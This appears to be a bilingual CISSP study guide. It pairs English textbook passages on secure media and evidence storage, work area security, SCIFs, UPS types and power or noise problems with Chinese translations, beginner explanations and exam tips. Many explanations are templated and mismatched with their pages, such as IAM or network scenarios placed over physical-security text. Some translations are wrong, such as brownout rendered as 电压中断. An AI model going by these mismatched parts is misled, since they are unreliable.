Media can also be verified using a hash-based integrity check mechanism to ensure either that valid files remain valid or that a medium has been properly and fully sanitized to retain no remnants of previous use.

中文直译 / 整理

媒体存储设施应设计为能够安全地存储空白介质、可重复使用的介质,甚至 安装介质。 无论是硬盘、闪存设备、光盘还是磁带,介质都应受到保护,以 防被盗或损坏。 一个上锁的存储柜或储藏室通常足以满足此目的,但如有必 要,也可安装保险箱。 新空白介质应妥善保管,以防止他人窃取或在其上植 入恶意软件。 可重复使用的媒体,如优盘、闪存卡或便携式硬盘,应防止被盗和数据残留恢 复。 数据残留是指在使用不充分的清除过程后,存储设备上残留的数据元素 (参见第5章,“保护资产安全”)。 标准的删除或格式化过程仅清除目录结 构并将簇标记为可用,但原始数据仍保留在簇中。 简单的undeletion工具或数 据恢复扫描仪通常可以恢复对这些文件的访问。 限制对媒体的访问并使用安全 擦除解决方案可以降低此风险。 安装介质必须防止被盗和恶意软件植入。 这将确保在需要执行新安装时,介质 可用且安全。 以下是一些实施安全媒体存储设施的方法: 将媒体存放在上锁的柜子或保险箱中,而非办公用品架上。 指定一名媒体管理员或保管人负责管理对上锁 媒体柜的访问权限。 使用签入/签出流程来跟踪谁取用、使用和归还 存储中的媒体。

对于可重复使用的媒体,当设备归还时,执行安全的磁盘清理或零化 (一种通过用无意义数据(如零)替换数据来清除所有数据残留的程序) 过程,以移除所有数据残留。 媒体还可以通过基于哈希的完整性检查机制进行验证,以确保有效文件保 持有效,或确保介质已正确且完全清除,不留任何先前使用的痕迹。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 24 / PDF P679

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A safe is a movable secured container that is not integrated into a building's construction. A vault is a permanent safe or strongroom that is integrated into a building's construction. For more security-intensive organizations, placing a security notification label on media may be necessary to indicate its use classification or employ RFID/NFC asset tracking tags on media (see Chapter 11). Higher levels of protection could also include fire, flood, electromagnetic field, and temperature monitoring and protection. Evidence Storage Evidence storage is quickly becoming a necessity for all businesses, not just law enforcement–related organizations.

A key part of incident response is gathering evidence for root cause analysis (see Chapter 17). As cybercrime events continue to increase, it is important to retain logs, audit trails, and other records of digital events. It may also be necessary to retain image copies of drives or snapshots of virtual machines for future comparison. This may be related to internal corporate investigations or law enforcement–based forensic analysis. In either case, preserving datasets that might be used as evidence is essential to the favorable conclusion to a corporate internal investigation or a law enforcement investigation of cybercrime.

Secure evidence storage is likely to involve the following: Using a dedicated storage system distinct from the production network Potentially keeping the storage system offline when not actively having new datasets transferred to it Blocking internet connectivity to and from the storage system Tracking all activities on the evidence storage system Calculating hashes for all datasets stored on the system Limiting access to the security administrator and legal counsel Encrypting all datasets stored on the system

中文直译 / 整理

保险箱是一种可移动的安全容器,未集成到建筑结构中。 金库是一种永 久性保险箱或强室,集成在建筑结构中。 对于安全性要求更高的组织,可能需要在介质上放置安全通知标签以标明其 使用分类,或在介质上使用RFID/NFC资产跟踪标签(参见第11章)。 更高 水平的保护措施还可包括对火灾、水灾、电磁场和温度的监控与防护。 证据存储 证据存储正迅速成为所有企业的必要需求,而不仅限于执法相关组织。 事件响 应的关键部分是收集用于根本原因分析的证据(参见第17章)。 随着网络犯罪 事件持续增加,保留日志、审计跟踪以及其他数字事件记录至关重要。 可能还 需要保留磁盘的镜像副本或虚拟机的快照,以供将来比对。 这可能与企业内部 调查或执法机构的法医分析相关。 无论哪种情况,保存可能作为证据使用的数 据集,对于企业内部调查或网络犯罪执法调查的顺利结案都至关重要。 安全的证据存储可能涉及以下内容: 使用与生产网络分离的专用存储系统 在未主动传输新数据集时,可能将存储系统保持离线状态 阻止对存储系统进行网络连接跟踪证据存储系统上的所有活动 计算存储在系统上的所有数据集的哈希值 将访问权限限制为安全管理员和法律顾问对存储在系统上的所 有数据集进行加密

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 25 / PDF P680

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

There may be additional security requirements for an evidence storage solution based on your local regulations, industry, or contractual obligations. See Chapter 19, “Investigations and Ethics,” for more. Work Area Security The design and configuration of internal security, including work areas and visitor areas, should be considered carefully. There should not be equal access to all locations within a facility. Areas that contain assets of higher value or importance should have more restricted access.

For example, anyone who enters the facility should be able to access the restrooms and the public telephone without going into sensitive areas, and only network administrators and security staff should have access to the server room and wiring closets. Valuable and confidential assets should be located in a facility's center of protection. In effect, you should focus on deploying concentric circles of physical protection. This type of configuration requires increased levels of authorization to gain access to more sensitive areas inside the facility. Walls or partitions can be used to separate similar but distinct work areas.

Such divisions deter casual shoulder surfing or eavesdropping (shoulder surfing is the act of gathering information from a system by observing the monitor or the use of the keyboard by the operator). Floor-to-ceiling walls should be used to separate areas with differing sensitivity and confidentiality (where false or suspended ceilings are present, walls should cut these off to provide an unbroken physical barrier between more and less secure areas). A clean-desk policy (or clean-desk-space policy) instructs workers how and why to clean off their desks at the end of each work period. In relation to security, such a policy primarily aims to reduce the disclosure of sensitive information.

This can include passwords, financial records, medical information, sensitive plans or schedules, and other confidential materials. If, at the end of each day/shift, a worker places all work materials into a lockable desk drawer or file cabinet, this prevents exposure, loss, and/or theft of these materials. Each work area should be evaluated and assigned a classification just as IT assets are classified. Only people with clearance or classifications corresponding to the classification of the work area should be allowed access. Areas with different purposes or uses should be assigned different levels of access or restrictions. The more access to assets the equipment within an area

中文直译 / 整理

根据您的当地法规、行业或合同义务,证据存储解决方案可能还有其他安全要 求。 请参阅第19章“调查与伦理”以获取更多信息。 工作区安全 应仔细考虑内部安全的设计与配置,包括工作区和访客区。 设施内的所有区域 不应享有同等访问权限。 包含更高价值或重要资产的区域应具有更严格的访问 限制。 例如,任何进入设施的人都应能够访问洗手间和公共电话,而无需进入 敏感区域; 只有网络管理员和安保人员才能进入服务器室和配线间。 贵重和机 密资产应位于设施的中心防护区。 实际上,您应着重部署同心圆式的物理防护。 这种配置要求访问设施内更敏感区域时需具备更高层级的授权。 墙壁或隔断可用于分隔相似但不同的工作区域。 此类分隔可防止随意的窥视或 窃听(窥视是指通过观察显示器或操作员使用键盘来获取系统信息的行为)。 应使用从地板到天花板的墙壁来分隔敏感性和机密性不同的区域(若存在假天 花板或吊顶,墙壁应切断这些结构,以在较安全和较不安全区域之间提供连续 的物理屏障)。 一种整洁桌面政策(或整洁桌面空间政策)指导员工如何以及为何在每个工作 时段结束时清理桌面。 在安全方面,此类政策的主要目的是减少敏感信息的泄 露。

这可能包括密码、财务记录、医疗信息、敏感计划或日程安排以及其他机 密材料。 如果每位员工在每天/每班结束时将所有工作材料放入可上锁的抽屉或 文件柜中,即可防止这些材料被暴露、丢失或被盗。 每个工作区域都应像IT资产一样进行评估并分配分类。 只有拥有与工作区域分 类相对应的权限或分类的人员才被允许进入。 具有不同目的或用途的区域应分 配不同的访问级别或限制。 区域内设备对资产的访问越多

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 26 / PDF P681

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

offers, the more critical the restrictions that are used to control who enters those areas and what activities they are allowed to perform. Your facility security design process should support the implementation and operation of internal security. In addition to managing workers in proper workspaces, you must address visitors and visitor control. Should there be an escort requirement for visitors, and what other forms of visitor control should be implemented? In addition to basic physical security tools such as door locks, person traps, video cameras, written logs, security guards, and RFID ID tags should be implemented.

An example of a secure or restricted work area is the sensitive compartmented information facility (SCIF). An SCIF is often used by government and military agencies, divisions, and contractors to provide a secure environment for highly sensitive data storage and computation. The purpose of an SCIF is to store, view, and update sensitive compartmented information (SCI), which is a type of classified information. An SCIF has restricted access to limit entrance to those individuals with a specific business need and authorization to access the data contained within. This is usually determined by the individual's clearance and SCI approval levels.

In most cases, a SCIF is restricted against using or possessing photography, video, or other recording devices in the secured area. An SCIF can be established in a ground-based facility, an aircraft, or a floating platform. It can be a permanent installation or a temporary establishment, and it is typically located within a structure, although an entire structure can be implemented as an SCIF. Utility Considerations Reliable operations of IT and continued ability to perform business tasks often depend on consistency in the mundane utilities. The following sections discuss security concerns of power, noise, temperature, and humidity.

Power Considerations Power supplied by electric companies is not always consistent and clean. Most electronic equipment demands clean power to function properly. Equipment damage from power fluctuations is a common occurrence. Many organizations opt to manage their own power through various means. The first stage or level of power management is using surge protectors. However, these only offer protection against power overloads. In the event a spike of

中文直译 / 整理

用于控制谁可以进入这些区域以及允许他们执行哪些活动的限制就越严格。 您的设施安全设计流程应支持内部安全的实施与运行。 除了在适当的工作区域 内管理员工外,您还必须应对访客及其管控问题。 是否需要为访客安排陪同人 员? 还应实施哪些其他形式的访客管控措施? 除了基本的物理安全工具,如门 锁、人员陷阱、视频摄像头、书面记录、安保人员和RFID身份标签外,也应 予以实施。 一个安全或受限工作区的例子是敏感隔离信息设施(SCIF)。 SCIF通常由政 府和军方机构、部门及承包商使用,以提供一个用于存储和处理高度敏感数 据的安全环境。 SCIF的目的是存储、查看和更新敏感隔离信息(SCI),这 是一种机密信息。 SCIF具有受限访问权限,仅允许具有特定业务需求并获得 授权的人员进入,以访问其中包含的数据。 这通常由个人的安全等级和SCI批 准级别决定。 在大多数情况下,SCIF禁止在受控区域内使用或携带摄影、视 频或其他记录设备。 SCIF可以建立在地面设施、飞机或浮动平台上,既可以 是永久性设施,也可以是临时性设置,通常位于某一建筑内,但整个建筑也 可被用作SCIF。

实用性考虑 IT的可靠运行以及持续执行业务任务的能力通常依赖于日常公用设施的一致性。 以下部分将讨论电源、噪声、温度和湿度的安全问题。 电源考虑 电力公司提供的电力并不总是稳定和纯净的。 大多数电子设备需要纯净的电力 才能正常运行。 由于电力波动导致的设备损坏是常见现象。 许多组织选择通过 各种方式自行管理电力。 电力管理的第一阶段或级别是使用浪涌保护器。 然而, 这些设备仅能提供针对电力过载的保护。 当发生电力尖峰时

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

身份:身份是主体在系统中的标识。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 27 / PDF P682

第 682 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

power occurs, the surge protector's fuse will trip or blow (i.e., burn out), and all power will be cut off. Surge protectors should be used only when instant termination of electricity will not cause damage to the equipment. The next level is to use a power conditioner or power-line conditioner. It is a form of advanced surge protector that is also able to remove or filter line noise. The third level of power protection is to use an uninterruptible power supply (UPS). A UPS is a type of self-charging battery that can be used to supply consistent, clean power to sensitive equipment. Most UPS devices provide surge protection, power conditioning, and battery-supplied supplemental power.

There are two main types of UPSs: double conversion and line interactive. A UPS can also be called a backup UPS or a standby UPS. A double conversion UPS functions by taking power in from the wall outlet, storing it in a battery, pulling power out of it, and then feeding that power to whatever devices are connected. By directing current through its battery, it is able to maintain a consistent, clean power supply to whatever devices are connected to it. A line-interactive UPS has a surge protector, battery charger/inverter, and voltage regulator positioned between the grid power source and the equipment. The battery is not in line under normal conditions.

If the grid fails, there is a type of three-position switch that will automatically switch so that power is pulled from the battery through the inverter and voltage regulator to provide power to the equipment. Lower-quality versions of this type of UPS may have a very short moment when power is interrupted. Although most systems should be able to continue operating with this fault, it can be damaging to sensitive devices or cause other equipment to shut down, freeze, or reboot. The primary purpose of an UPS is the battery-supplied power that can continue to support the operation of electrical devices in the event of power loss or a disconnect from the power grid.

A UPS can continue to supply power for minutes or hours, depending on its battery capacity and how much power the equipment attached to it needs (i.e., the load placed on it). When designing a UPS-based power management solution, consider what systems are critical and thus need continued power versus those that can be allowed to be powered off during any loss of power. This approach can assist with the optimization and distribution of critical power reserves.

中文直译 / 整理

电力时,浪涌保护器的保险丝会熔断或烧毁(即失效),所有电力将被切断。 只有在电力立即中断不会对设备造成损害的情况下,才应使用浪涌保护器。 下一层次是使用电源调节器或电源线路调节器。 这是一种高级浪涌保护器,能 够去除或过滤线路噪声。 第三级电源保护是使用不间断电源(UPS)。 UPS是一种自充电电池类型,可 用于为敏感设备提供稳定、干净的电源。 大多数UPS设备提供浪涌保护、电源 调节和电池供电的辅助电源。 UPS主要有两种类型:双转换式和线路互动式。 UPS也可以称为备用UPS或待机UPS。 双转换UPS的工作原理是:从墙上的插座获取电力,将其存储在电池中,再从 电池中取出电力,然后将该电力输送给连接的设备。 通过将电流引导经过其电 池,它能够为连接的设备维持稳定、干净的电源供应。 线路互动式UPS在电网电源与设备之间设有浪涌保护器、电池充电器/逆变器和 电压调节器。 在正常情况下,电池不在供电回路中。 如果电网断电,会有一个 三位置开关自动切换,使电力通过逆变器和电压调节器从电池中提取,为设备 供电。 这类UPS的低质量版本可能在断电时出现极短的电力中断。

虽然大多数 系统应能在此故障下继续运行,但可能会对敏感设备造成损害,或导致其他设 备关闭、冻结或重启。 UPS的主要目的是在断电或与电网断开时,由电池供电以继续支持电气设备的 运行。 UPS可以持续供电数分钟或数小时,具体取决于其电池容量以及连接设 备所需的功率(即其负载)。 在设计基于UPS的电源管理解决方案时,请考虑哪些系统是关键的,因此需要 持续供电,而哪些系统可以在断电时允许关闭。 这种方法有助于优化和分配关 键电源储备。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 682 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 28 / PDF P683

第 683 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Another power option is a large-scale battery backup or a failover battery. This system collects power into a battery but can switch to pulling power from the battery when the power grid fails. Generally, this system is implemented to supply power to an entire building rather than just one or a few devices. Many traditional versions of battery backups were not implemented as a form of UPS, and thus, there was usually a period of time (even if just a moment) of complete power loss to the equipment as the grid source of power failed and a switching event occurred to retrieve power from a battery. Some modern battery backups are implemented more like a UPS so that power is not interrupted.

Such battery backups are often associated with solar power or other green or renewable energy solutions. However, they can be used with a grid-only source of power. The highest level of power protection is the use of generators. If maintaining operations for a considerable time despite a brownout or blackout is necessary, on-site electric generators are required. Such generators turn on automatically when a power failure is detected. Most generators operate using a fuel tank of liquid or gaseous propellant that must be maintained to ensure reliability. Electric generators are considered alternate or backup power sources.

With sufficient fuel supply, especially if resupply is possible, then a power generator can serve as an alternative power source for a long time. UPSs should still be used even when a generator is installed to provide continuous alternative power. In this situation, the purpose of the UPS is to provide power long enough to complete a logical shutdown of a system, or until a generator is powered on and provides stable power. It may take a generator several minutes before it is triggered, starts (i.e., turns on), and is warmed up to provide consistent power. Ideally, power is consistently clean without any fluctuations, but in reality, commercial power suffers from many problems.

Here is a list of terms associated with power issues you should know: Fault: Momentary complete loss of power Blackout: Prolonged complete loss of power Sag: Momentary low voltage Brownout: Prolonged low voltage Spike: Momentary high voltage

中文直译 / 整理

另一种电源选择是大规模电池备份或备用电池。 该系统将电能收集到电池中, 当电网断电时,可以切换为从电池中取电。 通常,该系统用于为整个建筑物供 电,而不仅仅是一台或几台设备。 许多传统的电池备份系统并未作为UPS实现, 因此在电网电源中断和切换至电池供电时,设备通常会经历一段完全断电的时 间(即使只是瞬间)。 一些现代电池备份系统更像UPS,因此不会中断供电。 此类电池备份通常与太阳能或其他绿色或可再生能源解决方案相关联,但也可 仅与电网电源配合使用。 最高级别的电源保护是使用发电机。 如果在电压骤降或断电期间仍需长时间维 持运行,则需要配备现场电力发电机。 此类发电机在检测到断电时会自动启动。 大多数发电机使用液体或气体燃料箱作为动力源,必须定期维护以确保可靠性。 电力发电机被视为备用或应急电源。 若有充足的燃料供应,特别是能够实现补 给的情况下,发电机可作为长期的替代电源。 即使安装了发电机以提供持续的备用电源,仍应使用UPS。 在这种情况下, UPS的作用是提供足够的时间,以完成系统的逻辑关闭,或直至发电机启动 并提供稳定电力。 发电机从触发、启动(即开启)到预热并提供稳定电力, 可能需要数分钟时间。

理想情况下,电源始终稳定清洁,无任何波动,但现实中,商用电源存在诸 多问题。 以下是您应了解的与电源问题相关的术语列表: 故障:电源的瞬时完全中断 断电:电源的长期完全中断 电压暂降:瞬时低电压 电压中断:持续低电压 电压浪涌:瞬时高电压

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 683 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 29 / PDF P684

第 684 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Surge: Prolonged high voltage Inrush: An initial spike of power usually associated with connecting to a power source Ground: The wire in an electrical circuit that provides an alternate pathway for electricity to flow safely to the earth (i.e., the ground) All of these issues can cause problems for electrical equipment. When you're experiencing a power issue, you have to determine where the fault is occurring. If the issue takes place outside your meter, then it is to be repaired by the power company, whereas any internal issues are your responsibility. Noise Noise is power interference through disturbance, interruption, or fluctuation.

Noise that is not consistent is labeled as transient noise. Noise can cause more than just problems with how equipment functions related to its power source; it can also interfere with the quality of communications, transmissions, and playback. Noise generated by electric current, that is, electromagnetic interference (EMI), can affect data transmission that relies on electromagnetic transport mechanisms, such as telephone, cellular, television, audio, radio, and network connections. Radio-frequency interference (RFI) is another source of noise and interference that can affect many of the same systems as EMI.

A wide range of common electrical appliances generate RFI, including fluorescent lights, electrical cables, electric space heaters, computers, elevators, motors, and electric magnets, so it's important to locate all such equipment when deploying IT systems and infrastructure elements. Protecting your power supply and equipment from noise is essential to maintaining a productive and functioning environment for your IT infrastructure.

Steps to take for this kind of protection include providing sufficient power conditioning, establishing proper grounding, using shielded cables, running cables through shielding conduits, switching to fiber-optic cables for networking, and limiting copper cable exposure to EMI and RFI sources. Temperature, Humidity, and Static In addition to power considerations, maintaining the environment involves control over the HVAC mechanisms. Rooms intended primarily to house

中文直译 / 整理

浪涌:持续的高电压 浪涌:连接电源时通常出现的初始功率尖峰 接地:电气电路中为电流提供安全流向大地(即地)的备用路径的导线 所有这些问题都可能导致电气设备出现问题。 当您遇到电力问题时,必须确定 故障发生的位置。 如果问题发生在电表外部,则由电力公司负责维修; 而任何 内部问题则由您负责。 噪声 噪声是通过干扰、中断或波动引起的电力干扰 . 不一致的噪声被称为瞬态噪声。 噪声不仅会影响设备与其电源相关的功能, 还可能干扰通信、传输和播放的质量。 由电流产生的噪声,即电磁干扰( EMI),会影响依赖电磁传输机制的数据传输,例如电话、蜂窝、电视、音频、 无线电和网络连接。 射频干扰(RFI)是另一种噪声和干扰源,可能影响与电磁干扰(EMI)相同 的许多系统。 多种常见的电器设备都会产生射频干扰,包括荧光灯、电气电 缆、电暖器、计算机、电梯、电机和电磁铁,因此在部署IT系统和基础设施 时,定位所有此类设备至关重要。 保护您的电源和设备免受噪声影响,对于维持IT基础设施的高效和正常运行环 境至关重要。

实现此类保护的措施包括提供足够的电源调节、建立适当的接地、 使用屏蔽电缆、将电缆穿入屏蔽导管、将网络连接切换为光纤电缆,以及限制 铜缆暴露于电磁干扰(EMI)和射频干扰(RFI)源。 温度、湿度和静电 除了功耗考虑外,环境维护涉及对暖通空调系统的控制。 主要用于放置

小白解释

场景先行:你是公司的安全负责人,正在读第 684 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 684 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 30 / PDF P685

第 685 页学习单元

